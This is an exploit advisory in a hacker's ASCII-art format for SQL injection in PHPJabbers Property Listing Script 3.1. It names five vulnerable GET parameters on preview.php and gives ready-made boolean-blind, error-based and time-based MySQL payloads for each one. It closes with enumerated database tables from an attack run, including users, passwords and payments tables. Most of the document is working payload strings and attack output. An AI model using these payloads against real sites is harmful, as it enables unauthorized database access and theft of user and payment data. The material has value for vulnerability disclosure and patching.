┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                  [ Vulnerability ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : PHPJabbers.com                                                             │
│  Vendor   : PHPJabbers                                                                 │
│  Software : PHPJabbers Property Listing Script 3.1                                     │
│  Vuln Type: SQL Injection                                                              │
│  Impact   : Database Access                                                            │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                                                                                       ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│ Release Notes:                                                                         │
│ ═════════════                                                                          │
│                                                                                        │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and     │
│ damage to a company's reputation.                                                      │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
       
	CryptoJob (Twitter) twitter.com/CryptozJob
	   
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2023                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: preview.php

/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=[SQLI]&min_bedrooms=[SQLI]&max_bedrooms=[SQLI]&min_bathrooms=[SQLI]&max_bathrooms=[SQLI]&min_floor_area=11&max_floor_area=33

GET parameter 'feature_id' is vulnerable to SQLI

---
Parameter: feature_id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' RLIKE (SELECT (CASE WHEN (2062=2062) THEN 1 ELSE 0x28 END)) AND 'NbjG'='NbjG&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2733=2733,1))),0x716b707171),2733) AND 'iWla'='iWla&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' AND (SELECT 3509 FROM (SELECT(SLEEP(5)))pnEw) AND 'UOAT'='UOAT&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33
---

GET parameter 'min_bedrooms' is vulnerable to SQLI

---
Parameter: min_bedrooms (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) RLIKE (SELECT (CASE WHEN (7879=7879) THEN 1 ELSE 0x28 END))-- HIzI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2095=2095,1))),0x716b707171),2095)-- bfcY&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND (SELECT 9649 FROM (SELECT(SLEEP(5)))cOvl)-- zdSI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33
---

GET parameter 'max_bedrooms' is vulnerable to SQLI

---
Parameter: max_bedrooms (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) RLIKE (SELECT (CASE WHEN (6630=6630) THEN 2 ELSE 0x28 END))-- gEsM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(9738=9738,1))),0x716b707171),9738)-- jXwM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND (SELECT 3446 FROM (SELECT(SLEEP(5)))VCFX)-- cQSs&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33
---

GET parameter 'min_bathrooms' is vulnerable to SQLI

---
Parameter: min_bathrooms (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) RLIKE (SELECT (CASE WHEN (2227=2227) THEN 2 ELSE 0x28 END))-- lmwd&max_bathrooms=3&min_floor_area=11&max_floor_area=33

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(4352=4352,1))),0x716b707171),4352)-- OidJ&max_bathrooms=3&min_floor_area=11&max_floor_area=33

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND (SELECT 6082 FROM (SELECT(SLEEP(5)))PGLl)-- mBCY&max_bathrooms=3&min_floor_area=11&max_floor_area=33
---

GET parameter 'max_bathrooms' is vulnerable to SQLI

---
Parameter: max_bathrooms (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) RLIKE (SELECT (CASE WHEN (9932=9932) THEN 3 ELSE 0x28 END))-- GPVf&min_floor_area=11&max_floor_area=33

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(3098=3098,1))),0x716b707171),3098)-- hFHq&min_floor_area=11&max_floor_area=33

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND (SELECT 4637 FROM (SELECT(SLEEP(5)))iqxa)-- IvPE&min_floor_area=11&max_floor_area=33
---


[+] Starting the Attack

fetching tables for database: '********_****_***'
Database: ********_****_***
[66 tables]
+------------------------------------------+
| property_listing_features                |
| property_listing_fields                  |
| property_listing_multi_lang              |
| property_listing_options                 |
| property_listing_passwords               |
| property_listing_payments                |
| property_listing_periods                 |
| property_listing_plugin_country          |
| property_listing_plugin_galleries_set    |
| property_listing_plugin_gallery          |
| property_listing_plugin_locale_languages |
| property_listing_plugin_locale           |
| property_listing_plugin_log_config       |
| property_listing_plugin_log              |
| property_listing_plugin_one_admin        |
| property_listing_plugin_paypal           |
| property_listing_plugin_sms              |
| property_listing_properties_features     |
| property_listing_properties              |
| property_listing_roles                   |
| property_listing_types                   |
| property_listing_users                   |
| property_listing_features                |
| property_listing_fields                  |
| property_listing_multi_lang              |
| property_listing_options                 |
| property_listing_passwords               |
| property_listing_payments                |
| property_listing_periods                 |
| property_listing_plugin_country          |
| property_listing_plugin_galleries_set    |
| property_listing_plugin_gallery          |
| property_listing_plugin_locale_languages |
| property_listing_plugin_locale           |
| property_listing_plugin_log_config       |
| property_listing_plugin_log              |
| property_listing_plugin_one_admin        |
| property_listing_plugin_paypal           |
| property_listing_plugin_sms              |
| property_listing_properties_features     |
| property_listing_properties              |
| property_listing_roles                   |
| property_listing_types                   |
| property_listing_users                   |
| property_listing_features                |
| property_listing_fields                  |
| property_listing_multi_lang              |
| property_listing_options                 |
| property_listing_passwords               |
| property_listing_payments                |
| property_listing_periods                 |
| property_listing_plugin_country          |
| property_listing_plugin_galleries_set    |
| property_listing_plugin_gallery          |
| property_listing_plugin_locale           |
| property_listing_plugin_locale_languages |
| property_listing_plugin_log              |
| property_listing_plugin_log_config       |
| property_listing_plugin_one_admin        |
| property_listing_plugin_paypal           |
| property_listing_plugin_sms              |
| property_listing_properties              |
| property_listing_properties_features     |
| property_listing_roles                   |
| property_listing_types                   |
| property_listing_users                   |
+------------------------------------------+


[-] Done